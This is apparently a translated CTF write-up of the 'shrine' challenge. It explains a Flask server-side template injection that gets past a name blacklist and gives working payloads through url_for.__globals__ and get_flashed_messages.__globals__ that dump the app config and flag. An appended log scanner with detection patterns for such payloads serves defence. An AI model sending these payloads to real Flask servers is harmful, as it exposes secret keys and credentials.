[CTF/Network Security] A detailed analysis of the problem solving of shrine in the offensive and defensive world
Approach
Challenge code:
import flask
import os

app = flask.Flask(__name__)  # create the Flask application object
app.config['FLAG'] = os.environ.pop('FLAG')  # store FLAG from the environment in the config and remove it from the environment

@app.route('/')
def index():
    return open(__file__).read()  # open the current file and return its source

@app.route('/shrine/<path:shrine>')  # the <path:shrine> parameter was lost in extraction and is restored here
def shrine(shrine):  # takes the shrine path segment, passes it through safe_jinja() and renders it as a Jinja2 template

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    # strip parentheses from the string, then prefix a statement that sets each blacklisted name to None

    return flask.render_template_string(safe_jinja(shrine))  # render the "sanitised" Jinja2 template

if __name__ == '__main__':
    app.run(debug=True)  # app.run(debug=True) only executes when the script is run directly
This code is a simple Flask application. It creates a Flask application object and sets a configuration item called FLAG whose value comes from an environment variable. Two routes are then defined: one returns the source of the current file, the other renders the user-supplied path segment as a Jinja2 template.
The flag is presumably stored in the config item named FLAG, but the blacklist filters the name config; since the input is rendered through Jinja2, this points to SSTI.
In this program, /shrine/ is the defined routing path; whatever follows it is matched to the shrine parameter of the handler.
So construct the path:
/shrine/{{1*1}}
The response renders 1, which shows that SSTI is feasible.
Method One
In Flask, url_for is a function defined in one of Flask's own modules, so accessing url_for.__globals__ exposes the global namespace of that module.
That namespace contains current_app. Its config holds the application configuration (database connection strings, secret keys and so on, including FLAG here). Note that the blacklist only sets the template variable config to None; the attribute access .config on the application object is not affected. So we access the config of the current app and construct the POC:
/shrine/{{url_for.__globals__['current_app'].config}}
# access the current application's config object through Flask's global namespace
The response is as follows:
The flag is obtained.
Method Two
get_flashed_messages() is a function provided by Flask, used to retrieve messages passed to the user through Flask's message flashing mechanism (flash).
In Flask, flash messages are a temporary storage mechanism that passes a message from one request to the next. It is typically used to show the user a one-time notice or warning.
Payload:
/shrine/{{get_flashed_messages.__globals__}}
# access the global namespace
Payload:
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
# likewise, access the config of the current app
The flag is obtained.
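Both methods above get past the name blacklist by reaching current_app through the __globals__ of a Flask helper, so a defender reviewing access logs for this application should look for template delimiters and dunder attribute access in request paths rather than for the word config. The following scanner is an added example, not part of the original write-up; the log lines are constructed and the indicator list is my own assumption:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the write-up); the request paths mirror
# the payloads discussed above, percent-encoded the way a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /shrine/hello HTTP/1.1" 200 5
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /shrine/%7B%7B1*1%7D%7D HTTP/1.1" 200 1
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /shrine/%7B%7Burl_for.__globals__%5B%27current_app%27%5D.config%7D%7D HTTP/1.1" 200 240
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /shrine/%257B%257Bget_flashed_messages.__globals__%257D%257D HTTP/1.1" 200 3000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Indicators from least to most specific (assumed list). Delimiters alone show template syntax
# reached the server; dunder access and Flask helper names show an attempt to leave the template namespace.
INDICATORS = [
    ("jinja_delimiter", re.compile(r"\{\{|\{%")),
    ("dunder_access", re.compile(r"__[a-z]+__")),
    ("flask_global", re.compile(r"\b(url_for|get_flashed_messages|lipsum|cycler|joiner|namespace)\b")),
    ("app_config", re.compile(r"current_app|\bconfig\b")),
]

def normalize_path(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan_line(line):
    """Return the indicator names matched by the request path of one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    path = normalize_path(m.group("path"))
    return [name for name, rx in INDICATORS if rx.search(path)]

def scan_log(text):
    """Return (line_number, decoded_path, indicators) for every request that matched an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        found = scan_line(line)
        if found:
            hits.append((n, normalize_path(REQUEST_RE.search(line).group("path")), found))
    return hits

if __name__ == "__main__":
    for n, path, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {path} -> {', '.join(found)}")
```

A hit on jinja_delimiter alone is worth a look; a path that also trips dunder_access and flask_global is the pattern used in both methods above and should be escalated.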
Summary
The above is a detailed analysis of the shrine challenge from [CTF/Network Security] Attack and Defense World, covering SSTI in Jinja2.
I am Qiu said, see you next time.